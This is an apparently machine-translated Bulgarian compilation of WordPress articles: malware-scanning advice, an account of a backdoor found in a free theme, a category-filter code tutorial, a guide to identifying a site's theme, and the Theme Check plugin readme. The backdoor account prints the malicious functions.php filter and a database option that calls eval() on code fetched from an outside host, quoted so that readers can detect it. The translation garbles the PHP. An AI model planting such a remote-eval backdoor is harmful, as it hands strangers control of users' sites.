Необходима е периодична проверка на сайта за злонамерени вируси, това е първата заповед на всеки уважаващ себе си уеб администратор. Дори и да използвате чиста тема на Twenty Eleven, не е факт, че с времето тя също не се е заразила. Това явление може (и най-често се случва) да възникне поради факта, че самият двигател на WordPress първоначално е проектиран за онлайн публикуване. Така че никога не пречи да проверите отново и да направите копие на сайта и базата данни.

Например, аз (след известно време, разбира се) направих едно заключение за себе си - просто се нуждаете от добър хостер и вашите проблеми с резервацията ще изчезнат сами. Не е необходимо да правя резервни копия на базата данни или сайта сега - хостерът прави всичко вместо мен и автоматично. По всяко време, ако желаете, можете да поръчате копие на всеки раздел от вашия блог (и не само), да изтеглите това копие или да възстановите блога директно от контролния панел. Тоест не е нужно да тегля бекъп, всичко става автоматично - архивиране, възстановяване и т.н. Това е удобно, защото мога да следя не само по дни, но и по часове кога се е появил вирус в блога ми и съответно да взема мерки за премахването му.

Ще започна с добрата новина - поне два плъгина, които съм използвал, дават хубави резултатиоткриване и локализиране на зловреден код. Това са добавките AntiVirus и Exploit Scanner. Няма да повярвате колко лош код има във вашия блог! Но не приемайте цялата получена информация след проверка като догма - много редове, които тези плъгини откриват, всъщност не носят нищо лошо в себе си. Просто приставката поставя под въпрос някои редове, това е всичко. За да проверите това, проверете ръчно фрагментите, които плъгинът е идентифицирал като злонамерени. Така че, когато проверявате приставката Антивирусна програмаОказа се, че дори просто извикване на функция get_cache_file () вече се счита за подозрително от плъгина. Така че всички резултати от проверките ще трябва да се проследяват ръчно. Но това например е наистина заразена връзка и трябва да бъде премахната:

Как да разберете дали е вирус или трябва да е? Всичко е много просто - сравнете чистия си шаблон (ако има такъв) и го сравнете (файл по файл) с този, който е инсталиран и вече е претърпял някои промени. Не е необходимо да правите сравнение директно и буквално, просто използвайте търсене, за да проверите дали вашият чист шаблон съдържа реда, който плъгинът е маркирал. Ако има, щракнете върху бутона „Това не е вирус“ и този ред няма да бъде взет предвид при следващата проверка.

И ето пример за втория плъгин, който опитах - Експлойт скенер

Както виждате, тук всичко е много по-занемарено. За мен този резултат беше шокиращ. Но това не е всичко. Плъгинът има такава функция като проверка. Така че, ако го включите, се оказва, че блогът трябва да се състои от текст и максимум няколко CSS таблици. Така че, струва ми се, че авторът на плъгина очевидно е прекалил със сигурността тук. Добре е, че плъгинът само показва предполагаемите заразени фрагменти, а не ги почиства.

След като анализирате всички редове, маркирани в жълто, можете лесно да откриете злонамерен софтуер (зловреден код), добре, какво да правите с него след това зависи от вас. Методът за почистване остава същият - сравнете избрания код с резервното копие на сайта (вижте) и ако откриете несъответствия, разберете дали сте го направили сами или някой го е направил вместо вас, което означава, че това вече не е добро и може да се окаже вирус. Дори разработчиците на WordPress съветват да проверите сайта за злонамерен код с този конкретен плъгин. Но има такива безобидни вмъквания, например в тялото на iframe, които плъгинът също може да открие като заразен код. Но всъщност без тези редове този раздел от вашия блог няма да работи правилно.

Как изобщо злонамереният софтуер може да проникне във файловете на блога и какво е той по дефиниция? Думата злонамерен софтуер буквално означава - злонамерен софтуер , от английски злонамерен софтуер. Това е всеки софтуер, който може да се използва за неоторизиран достъп до сайта и неговото съдържание. Вероятно си представяте, че за един обучен средностатистически хакер няма да е трудно да хакне сайт, особено след регистрация. След това можете да промените съдържанието на блога, както желаете - това ще бъде образование.

Зловреден зловреден софтуер може също да бъде вмъкнат в добавки, от които инсталирате неизвестен източник, и в скриптове, които също понякога приемате без проверка, но вярвайки на автора. Най-безобидният зловреден софтуер е линк към автора на някой модул, който сте инсталирали на сайта. И ако самият автор не ви е предупредил, че съществува такава връзка, това вече е чист вирус.

И така, инсталирах в тестов блог нова тема, а след премахването на един безобиден линк към някакъв мъжки клуб в мазето на сайта, той изобщо спря да се отваря, а на основния се появи надпис - "Нямаш право да триеш линкове". Ето една безплатна тема за вас. Можете да прочетете за това как да разкъсате такива леви връзки.

Вашата база данни може да се използва и за стартиране на зловреден код. Спам връзките също много често се добавят към публикации или коментари. Такива връзки обикновено са скрити, когато CSS помощтака че неопитен администратор да не ги види, но система за търсенеразграничете ги веднага. Разбира се, всеки антиспам влиза в действие тук, например този, който е лицензиран, проверен и повторно проверен многократно. Хакерът може да изтегля файлове с разширения на файлове с изображения и да ги добавя към кода на вашите активирани добавки. Следователно, дори ако файлът няма разширение php, кодът в този файл може да бъде изпълнен.

Има още един прост инструмент, с който започнах запознанството си със зловреден софтуер - плъгинът Theme Authenticity Checker (TAC). Той е лек и достатъчно мощен, но проверява само вашите теми, дори и тези, които не са активни. Не докосва останалите директории и това е неговият минус. Ето какво получих от проверката на текущата си тема с този плъгин:

Две предупреждения в активната тема и нищо друго. Няма злонамерен код. Между другото, това са връзките, които сам вмъкнах по съвет на Google - за подобряване на качеството на фрагмента (показване на лични данни, адрес на организация и т.н.). Но това е само проверка на файловете на темата, а какво се прави в други директории, ще трябва да разберете или с помощта на други плъгини, или онлайн услуги. Например такава услуга (заслужава доверие) като Yandex Webmaster или подобна в Google. Те имат функцията да проверяват всеки уеб ресурс за злонамерени включвания и го правят ефективно. Но ако това не ви е достатъчно, сравнете резултатите с резултатите на други услуги и направете изводи.

По някаква причина искам да вярвам на Yandex, а не на плъгини. Друг добър ресурс е http://2ip.ru/site-virus-scanner/. След като проверих един от моите блогове, ето какво открих:

Тук можете също да проверите отделни файлове за злонамерен код, ако имате такива съмнения. Като цяло обслужването е добро.

От всичко казано по-горе бих направил следните изводи:

1. За да предотвратите появата на злонамерен код, трябва преди всичко да използвате доверени услуги за изтегляне на файлове - добавки, теми и др.

2. Редовно правете резервни копия на всичко, което съдържа сайта – бази данни, съдържание, админ панел, включително качени файлове на трети страни.

3. Насладете се на актуализациите, предлагани от WordPress. Те поне са без вируси, макар и не винаги функционално оправдани. Но като актуализирате, вие по този начин премахвате вирусите, които може да присъстват.

4. Неизползвани теми, плъгини, изображения и файлове, изтрийте без съжаление - това е още един резервен вариант за зловреден софтуер, за който може и да не се досетите.

5. Уверете се, че сте защитили с парола вашия FTP достъп, PhpAdmin влизане, администраторския панел и изобщо там, където никой освен вас не трябва да има достъп.

6. Опитайте (дори това желание да е голямо като небето) да не променяте или заменяте основните файлове на WordPress - разработчиците знаят по-добре какво трябва да работи и как.

7. След откриване и премахване на вируси сменете всички пароли. Мисля, че ще имате голямо желание да направите парола от 148 знака в различни регистри и със специални знаци. Но не се увличайте твърде много сложни пароли, можете да го загубите и след това трябва да възстановите всичко, което не е много приятно.

Всички тези методи и компоненти, които описах и които ще ви помогнат да се отървете от вируси, разбира се, са безплатни, разбира се, почти домашно приготвени и разбира се, не дават 100% гаранция, че вашият сайт ще бъде почистен от злонамерени вмъквания. Ето защо, ако вече сте загрижени за почистването на блога, тогава е по-добре да се свържете с професионалисти, например в услугата Сукури(http://sucuri.net/). Тук вашият сайт ще бъде внимателно наблюдаван, ще бъдат дадени практически препоръки, които ще ви бъдат изпратени с писмо, а ако не желаете сами да почиствате сайта, то на ваше разположение са специалисти, които ще направят всичко по най-добрия възможен начин в рамките на 4 часа:

Е, така изглежда моят тестов блог след мониторинг и това въпреки факта, че други методи (homebrew) винаги показват различни резултати. Както можете да видите, тестът е безплатен, но ако бъдат открити вируси, трябва да платите за премахването им, без да навредите на сайта (освен ако, разбира се, не сте гуру за почистване на блогове от зловреден софтуер).

Позволете ми още веднъж да подчертая, че хакерите са нащрек, вирусите непрекъснато се надграждат и е невъзможно да следите всичко сами. Всички иновации са толкова внимателно скрити и прикрити, че само екипът може да ги разкрие! професионалисти, а не самоуките блогъри, каквито са мнозина. Ето защо ръчното откриване и премахване на зловреден софтуер е толкова неефективно: няма опит - няма резултат, но има вирус. Използвайте лицензирани програмии поверете отстраняването на опасността на професионалисти

Здравейте приятели. Сигурни ли сте, че безплатният WordPress шаблон, който използвате за вашите уебсайтове и блогове, е наистина безопасен и не съдържа скрити заплахи и зловреден код? Сигурен ли си напълно в това? Абсолютно?)

Мислите, че са прокарали шаблона, премахнали са скритите връзки от него и е готово. Периодично сканирате файловете на сайта с антивирусна програма, разглеждате инструментите за уеб администратори на Yandex в раздела Сигурност и с облекчение виждате съобщение там: „ На сайта не е открит зловреден код«.

Това си помислих и аз. Не искам да те разстройвам, но...

Скрит опасен код в безплатни WordPress теми

Това е писмото, което получих миналата седмица по пощата от моя хостинг. Наскоро въведоха редовна проверка на всички файлове на сайта за злонамерено съдържание и все пак откриха това съдържание в мен!

Всичко започна с факта, че един ден отидох на сайта си и не можах да го стартирам - излезе злоупотребен надпис за ненамерени файлове с разширение php. След като се напрегнах малко, отидох да проуча съдържанието на папката със сайта на хостинга и веднага открих проблем - моят файл с шаблони fuctions.php беше преименуван на functions.php.malware, което, така да се каже, двусмислено намекна - антивирусна програма или нещо подобно работи тук) След като влязох в пощата, намерих горния доклад от хостера.

Първо, разбира се, започнах да проверявам този файл, проучих съдържанието му, сканирах го с всякакви антивируси, десетки онлайн услуги за сканиране на вируси и т.н. - в крайна сметка не намерих нищо, всички единодушно твърдяха, че файлът е напълно безопасен. Разбира се, изразих съмненията си на хостера, като казах, че сте объркали нещо, но за всеки случай ги помолих да предоставят доклад за откриването на злонамерен код.

И това ми казаха

Отидох в Google информация за този код и сериозно се замислих върху него ...

Как да намерите част от зловреден код в шаблон

Както се оказа, това е наистина нетривиален трик, който позволява на заинтересованите страни да прехвърлят данни към вашия сайт и да променят съдържанието на страниците без ваше знание! Ако използвате безплатен шаблон, тогава Силно препоръчвам да проверите вашия functions.php за следния код:

add_filter('the_content', '_bloginfo', 10001);
функция _bloginfo($съдържание)(
глобална $пост;
if(is_single() && ( [имейл защитен](get_option('blogoption'))) !== невярно)(
връща $co;
) иначе връща $съдържание;
}

Дори и с моите много плитки познания по php, може да се види, че се създава определен филтър, който е свързан с глобалната променлива post и content, които отговарят за показването на съдържание само на страници с публикации в блогове (условие is_single). Вече е подозрително, нали? Е, сега нека видим какво ще покаже това даден кодна нашия уебсайт.

Интересната опция за блог, поискана в базата данни, също изглежда много подозрителна. Влизаме в нашата база данни MySQL и намираме там таблица, наречена wp_options, ако не сте променили префиксите, тогава ще изглежда така по подразбиране. И в него откриваме интересна за нас линия, наречена blogoption

Каква красота! Виждаме следната опция


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Тези. ни от определен сайт (при това руски, имайте предвид) връщаме съдържание, което може да носи всичко! Безброй връзки, злонамерени кодове, променен текст и др. Самият сайт при достъп до него издава грешка за достъп 403, което не е изненадващо. Разбира се, премахнах и тази опция от базата данни.

Според информацията от потърпевшите, точно съдържанието на вашата статия обикновено се връща само с една модификация - вместо всяка точка "." отворена връзка беше маскирана в текста! И между другото, тази опция се записва в базата данни, когато самият шаблон е инсталиран, и след това кодът, който прави това, безопасно се самоунищожава. И аз живях с такива боклуци две години и нито една антивирусна програма или услуга не ми разкри тази заплаха за цялото това време. Честно казано, не забелязах дали тази техника някога е работила за мен или дали моята добавка за сигурност е блокирала тази възможност (или може би една от актуализациите на WordPressa е затворила тази дупка), но все пак е неприятно.

Морал на безплатното сирене

Как ви харесва изтънчеността на нашите "преводачи" на шаблони (или тези, които ги публикуват в каталозите си)? Не е за вас да изрязвате връзки от долния колонтитул) Жалко, че не помня откъде изтеглих шаблона си, беше отдавна, иначе щях да напиша няколко нежни. И ако по това време имах същия опит, който имам сега, тогава определено не бих използвал безплатен шаблон или, в краен случай, не бих изтеглил от неизвестни източници!

По-лесно е да си купите някакъв официален премиум шаблон за 15-20 долара на същия и да живеете спокойно, знаейки, че в него няма дупки и криптирани връзки и дори да има уязвимости, разработчиците определено ще пуснат актуализация, в която тези дупките ще бъдат затворени. ( Между другото, Артьом наскоро публикува статия, в която той просто говори за премиум шаблони и дори разпространява промоционални кодове за брутални отстъпки за тези, които се интересуват)

Представете си, че показвате записи и трябва да промените външен видв зависимост от рубриката. Например, имате блок „ЗА АВТОРА“, който показва информация за автора на статия, но не искате да виждате този блок, например, под публикации от категория, в която това не е необходимо. Можете също да деактивирате коментирането в определени категории, миниатюри и т.н. Всичко зависи от вашите нужди и фантазии. Лично аз много често използвам това условие.

За да филтрирате записи в зависимост от категорията, функцията ще помогне - in_category(). Тази функция проверява дали текущият или даден запис принадлежи към желаната категория, добре, или към няколко категории. Най-често тази функция се извежда във файл единичен.php, тъй като той отговаря за показването на записи.

Най-лесният начин за използване на функцията би изглеждал така. Добавяме този код към файла single.php, ако е необходимо, ограждаме таговете в PHP.

PHP таговете изглеждат така:

Ако вашата тема използва предимно HTML код, поставете кода по-долу без промени. Ако се използва предимно PHP, тогава етикетите, в които е затворен кодът, могат да бъдат премахнати.

В този код поставяме условие, че ако текущата публикация принадлежи към категория с ID - 12, тогава трябва да се покаже нещо. Каквото искате, добавете във фигурните скоби. Трябва да е PHP код, ако е трудно и трябва да добавите HTML код, след това разбийте кода със същите PHP тагове и кодът ще стане така:

//тук пишем обичайния HTML код или просто текст.

За да определите идентификатора на категориите, трябва да отидете в списъка с категории в админ панела и да задържите курсора на мишката върху желаната. В долната част на прозореца на браузъра, от дясната страна, ще се появи връзка, вътре в която ще бъде нещо като ID=1, тоест идентификаторът на тази категория е 1.

Ако трябва да посочите няколко категории, посочете ги разделени със запетаи. Може също да се наложи да създадете условие "АКО - ТОГАВА", тогава кодът ще бъде нещо подобно:

Представете си, че трябва да покажете миниатюра на публикация в рубрика 12 и първата снимка от текста в други публикации от други рубрики. Случва ли се това и как да го направя? С горния код. Можете да прочетете за изхода на първото изображение от записа в статията -

Сега искам да покажа още една функция, която може да се добави към тази функция. Случва се рубриките да имат подкатегории, тоест дъщерни категории. И ако записът принадлежи към една от подкатегориите, тогава условието ще го заобиколи. Ако това е, от което се нуждаете, тогава не можете да докосвате нищо, но ако въпреки това условието трябва да работи за подзаглавия, тогава трябва да добавите допълнение към условието. Като начало трябва да добавите следната част към самото условие - || post_is_in_descendant_category(12). Това е извикване на нашата нова функция, която ще проверява за подкатегории. Готовият код ще изглежда така:

За да започне да работи нова функция, трябва да добавите кода на самата тази функция, тоест трябва да го напишете. За да направите това, намерете файла в папката с активната тема functions.php, който съдържа дефинирани от потребителя функции. Ако не сте запознати с PHP, трябва да добавите код в самия край на файла, но ако има затварящ PHPетикет - ?> , тогава трябва да добавите преди него. Самият код изглежда така:

Функция post_is_in_descendant_category($cats, $_post = null) ( foreach ((array) $cats as $cat) ( // get_term_children() приема само целочислен идентификатор $descendants = get_term_children((int) $cat, "category"); ако ($descendants && in_category($descendants, $_post)) return true; ) return false; )

Ако всичко е направено правилно, тогава вашето условие ще избере публикации за определени категории и техните подкатегории.

Преди много време започнах да пиша тази статия, но всички ръце не стигнаха да завърша, после една, после втората прекъсна. Най-накрая статията приключи и може би много ще помогнат за решаването на проблема.

Това е всичко, благодаря за вниманието. 🙂

Чудили ли сте се някога каква тема използва определен сайт?

Често, в търсене на перфектната тема, разглеждаме други завършени проекти, за да намерим нещо подобно или да направим нашия сайт на същата тема, само че с наш индивидуален дизайн.

В този урок ще ви покажем инструментите и триковете, които можете да използвате, за да разберете каква тема използва този сайт на WordPress.

Метод 1: Сайт за проверка на IsItWP

Най-лесният начин е да отидете на isitwp.com и да разгледате сайта, който ви интересува.

Това е онлайн инструмент, който ще ви покаже каква тема използва WordPress и дали изобщо се използва WordPress на сайта.

Ако сайтът работи с WordPress, IsItWP ще се опита да разбере името на текущата тема.

Той също така ще се опита да разбере какви активни добавки се използват на сайта:

Ако имате късмет и това не е персонализирана или дъщерна тема, тогава IsItWP ще ви даде името на темата и можете да търсите тази тема допълнително.

Метод 2. Определете ръчно

Понякога собствениците на сайтове или разработчиците променят името на родния WordPress теми. В този случай инструменти като IsItWP няма да могат да ви помогнат.

Но дори и така, в кода на сайта може да има различни съвети, които ще ви помогнат да разберете какъв вид тема е инсталирана.

Да видим.

Всяка тема на WordPress трябва да има a style.css. Този файл съдържа заглавка вътре, която по правило показва името на темата, автора на темата, версията и сайта на разработчика на темата. Той също така определя други css шаблони, които темата използва.

За да намерите този файл, първо трябва да отидете на самия сайт. Щракнете с десния бутон някъде на главната страница и отидете до изглед на изходния код ( Виж източника на страницата).

Изходният код на главната страница на сайта ще се отвори в браузъра в нов раздел.

Сега трябва да намерите ред код, който изглежда по следния начин:

За да улесните нещата, можете да търсите в този раздел с кода на фрагмента " теми". Това е част от директорията, където style.css.

Така ще намерите пътя, където се намира файлът style.css, и можете да отворите този файл директно в браузъра в нов раздел.

В горната част на style.css ще има заглавка със заглавие (за което говорихме по-горе). Това е служебна информация за темата. Изглежда нещо подобно:

/* Име на тема: Име на тема URI на тема: https://example.com Автор: URI на автор на ThemeAuthorName: https://example.com Описание: My Theme е гъвкава тема на WordPress, предназначена за уебсайтове с портфолио Версия: 1.1.47 Лиценз: GNU General Public License v2 или по-нова URI на лиценза: http://www.gnu.org/licenses/gpl-2.0.html Текстов домейн: hestia Етикети: блог, персонализирано лого, портфолио, електронна търговия, rtl-language-support , постформати, мрежово оформление, една колона, две колони, персонализиран фон, персонализирани цветове, персонализирано заглавие, персонализирано меню, представено изображение, представени изображения, гъвкаво заглавие, пълна ширина -шаблон, лепкава публикация, опции за тема, коментари с резба, готов за превод */

От този блок можете да разберете името на темата и адреса на разработчика. След това остава само да намерите тази тема в Интернет.

Метод 3. Как да намерите основната тема

Много сайтове използват дъщерни теми, за да персонализират външния вид. И това е доста правилният подход.

В този случай, ако сте намерили файла style.cssот дъщерна тема, заглавката й ще съдържа информация за родителската тема:

/* Име на тема: Описание на темата My Child: Само дъщерна тема Автор: Питър Смит URL адрес на автора: Напишете тук URL адреса на блога или уебсайта на автора Шаблон: hestia Версия: 1.0 Лиценз: GNU General Public License v2 или по-нова URI на лиценза: http :/ /www.gnu.org/licenses/gpl-2.0.html Текстов домейн: my-child-theme */

В горния пример параметърът " Шаблон", което означава, че родителската тема "Hestia" се използва за тази дъщерна тема.

Можете също да научите за родителската тема от изходния код, описан в Метод 2. В кода ще намерите препратка към файла style.css не само от дъщерната тема, но и от родителската тема.

Но не забравяйте, че разработчикът може да опита и да промени всички заглавки за style.css на свои собствени, в който случай би било много трудно да се определи оригиналната тема.

Приставката за проверка на тема е лесен начин да тествате вашата тема и да се уверите, че отговаря на спецификациите с най-новите стандарти за преглед на тема. с него, можешстартирайте всички същите автоматизирани инструменти за тестване на вашата тема, които WordPress.org използва за изпращане на теми.

Тестовете се провеждат чрез просто администраторско меню и всички резултати се показват наведнъж. Това е много удобно за разработчиците на теми или за всеки, който иска да се увери, че тяхната тема поддържа най-новите стандарти и практики за теми на WordPress.

Как да активирате форматирането на trac

Екипът за преглед на теми използва този плъгин, докато преглежда теми и копира/поставя изхода в trac билети, trac системата има свой собствен език за маркиране.
За да активирате форматирането на trac в Theme-Check, трябва да дефинирате няколко променливи в wp-config.php:
TC_PREи TC_POSTсе използват като горен и долен колонтитул на билета.
Примери:
define('TC_PRE', 'Преглед на тема:[]
- Темите трябва да се преглеждат с помощта на "define(\'WP_DEBUG\', true);" wp-config.php[]
— Темите трябва да бъдат прегледани, като се използват тестовите данни от контролните списъци за теми (TC)
——
‘);

Define("TC_POST", "Чувствайте се свободни да използвате данните за контакт по-долу, ако имате въпроси, коментари или отзиви:[] [] * Оставете коментар за този билет[] * Изпратете имейл до имейла за преглед на темата list[] * Използвайте IRC канала #wordpress-themes на Freenode.");

Ако илиот тези две променливи са дефинирани, ново квадратче за отметка на trac ще се появи до Провери го!бутон.

Често задавани въпроси

Какво става с номерата на версиите?

Номерът на версията е датата на преразглеждане на насоките, използвани за създаването му.

Защо маркира нещо като лошо?

Това не е маркиране на „лоши“ неща като такива. Проверката на темата е предназначена да бъде неперфектен начин за тестване за съответствие с указанията за преглед на темата. Не всички теми трябва да се придържат към тези указания. Целта на инструмента за проверка е да гарантира, че темите, качени в централното хранилище на теми на WordPress.org, отговарят на най-новите стандарти за теми на WordPress и ще работят на голямо разнообразие от сайтове.

Много сайтове използват персонализирани теми и това е напълно добре. Но темите, които са предназначени за използване на много различни видове сайтове от обществеността, трябва да имат определено минимално ниво на възможности, за да осигурят правилно функциониране в много различни среди. Насоките за преглед на теми са създадени с тази цел.

Тази програма за проверка на теми не е перфектна и никога няма да бъде. Това е само инструмент в помощ на авторите на теми или на всеки друг, който иска да направи своята тема по-способна. Всички теми, изпратени до WordPress.org, се преглеждат ръчно от екип от експерти. Автоматизираната проверка на теми е предназначена да бъде само полезен инструмент, а не абсолютна система за измерване.

Този плъгин невземете решение за използваните насоки. Всички проблеми с конкретни насоки за преглед на теми трябва да бъдат обсъдени на сайта за създаване на теми.

Отзиви

Това е страхотен плъгин за всеки, който наистина обича да разработва тема на WordPress и да прави успешни тестове за основните стандарти на WordPress. Грешките, разделени в „Задължително“, „Предупреждение“, „Препоръчително“ и „Информация“. Предоставете също основната информация за тази грешка и ще разберете къде е проблемът.

Членове и разработчици

Theme Checker е проект с отворен код. Следните участници допринесоха за разработването на приставката:

Членове

Дневник на промените

20190801.1

  • Поправете липсващата проверка за еднократно и еднократно на страницата на администратора. подкрепя Стивън Стърн за докладването на проблема на екипа на добавките. Въпреки че технически това е CSRF, няма уязвимост, произтичаща от него, тъй като единственото нещо, което може да се направи с формуляра, е да се сканира тема.

20190208.1

  • Добавете нови стилове за редактора на блокове. Вижте https://meta.trac.wordpress.org/ticket/3921

20160523.1

  • Корекция за имена на теми с тирета в тях
  • Коментари премахване на промени
  • Много промени от екипа за преглед на темата и други. Вижте Github за пълен списък с промени.

20151211.1

  • Пълна синхронизация с Github и всички промени, които са се случили там.
  • Версия за 4.4 отхвърлени функции.

20140929.1

  • Добавени са нови проверки и актуализации от Франк Клайн в Automattic. Благодаря Франк!
  • Актуализирани списъци с остарели функции
  • Проверка на персонализатора: Всички add_settings трябва да използват обратни извиквания за дезинфекция за сигурност
  • Проверки на територията на добавките: Темите не трябва да регистрират типове публикации или таксономии или да добавят кратки кодове за съдържание на публикация
  • Widgets: Обажданията към register_sidebar трябва да бъдат извикани от куката за действие widgets_init
  • Заглавие: етикетите трябва да съществуват и неимат нещо друго освен извикване на wp_title()
  • CDN: Проверява за използване на общи CDN (само препоръчително)
  • Забележка: Променени URI адреси на плъгини и автори, тъй като старите URI адреси са невалидни. Те може да се променят отново в бъдеще, URI адресите към собствения ми сайт са само временно.

20131213.1

  • Коригирани грешки, които не се показват от плъгина и той неправилно дава резултат „пропуск“ за всичко.

20131212.1

  • Обновен за 3.8
  • Повечето файлове са променени за по-добра поддръжка на I18N, така че езиковите файлове бяха премахнати временно, докато преводът може да бъде направен отново.

20121211.1

  • Обновен за 3.5
  • Премахване на бутона PayPal.

20110805.1

  • Проверките на TimThumb са премахнати.
  • Екранната снимка вече се визуализира в резултатите, с размер на файла и размери.

20110602.2

  • Нови функции за списък с файлове, скрити папки, които вече могат да бъдат открити.
  • По-добри fopen чекове.
  • Tim Thumb версия бум

20110602.1

  • Проверките на стила на края на реда в DOS/UNIX вече са изискване за правилно качване на тема.
  • Изравняване на версията на Timthumb
  • Няколко поправки, докладвани от GaryJ
  • Добавени са отхвърлени функции 3.2

20110412.1

  • Коригирайте регулярните изрази
  • Добавена проверка за най-новия хак за инжектиране на долен колонтитул.
  • Проверка на коригиране на етикети, за да използвате правилно функцията за ново съдържание
  • Синхронизиране на всички промени, направени за проверка на темата за wporg uploader.
  • Актуализиран пост за чекове 3.1. добавена проверка на екранна снимка към svn.
  • Проверка на връзките за коригиране, за да не се върне фалшива грешка в някои случаи
  • rm една от проверките, които причиняват проблеми на wporg uploader (и която също е ненужна)
  • Преместете ненужните функции извън checkbase в main.php.
  • Само незначителни промени във форматирането (интервал и други подобни)
  • Добавяне на проверка за wp_link_pages() + проверка на коригиране на eval().

20110219.2

  • Обединени нови подпори на потребителския интерфейс Gua Bob
  • Последната тествана тема винаги е предварително избрана в списъка с теми.
  • Коригирана php грешка в admin_menu.php

20110219.1

  • Вижте дневника на ангажиментите за промени.

20110201.2

  • Поправки на грешки в потребителския интерфейс, реквизити за публикации във форума Mamaduka.
  • Textdomain проверява за двадесет и нито един домейн.
  • Коригирайте div, който не затваря подпори Mamaduka.

20110201.1

  • i18n работи
  • sr_RS de_DE ro_RO ланс реквизит Даниел Тара и Емил Узелак.
  • Добавена е поддръжка на дъщерна тема, направени са проверки спрямо родител И дете по време на изпълнение.
  • Добавен е бутон за форматиране на Trac за рецензенти.

20101228.3

  • Последна ревизия за 3.1 (надявам се)
  • Чипове предложение за проверка за включване на searchform.php (не
    перфектен все още, има нужда от още примери за търсене).
  • add_theme_page е задължителна, всички останали са маркирани и показани с ред
    числа.
  • Предимно интернационализирано, сега има нужда от преводи.
  • Изчистване на бъгове.

20101228.2

  • Добавена е проверка на менюто.
  • ThemeURI AutohourURI е добавен към резултатите.
  • Много малки поправки.
  • Започна превод.

20101228.1

  • Коригирайте проверката на филтъра embed_defaults и проверката на данните на файла със стилов лист.

20101226.1

  • Редизайн на цялата система, за да позволи по-лесно синхронизиране с програмата за качване на WordPress.org. Много други добавяния/изваждания/промени също.
  • Добавени са указания за WordPress 3.1, за да помогнат на авторите на теми да осигурят съвместимост за предстоящото издание.

20101110.7

  • Повторно добавени проверки на malware.php за fopen и file_get_contents (ИНФОРМАЦИЯ)
  • поправени са няколко недефинирани грешки в индекса.

20101110.4_r2

  • Коригирано предупреждение: Грешен брой параметри за stristr()

20101110.4_r1

  • Добавено ехо към suggested.php

20101110.4

  • Коригирано извикване на остаряла функция към get_plugins()

20101110.3

  • Фиксиран недефиниран индекс.

20101110.2

  • Липсва< in main.php
  • Добавени са условни проверки за license.txt ИЛИ тагове за лиценз в style.css
  • Подобрения на потребителския интерфейс.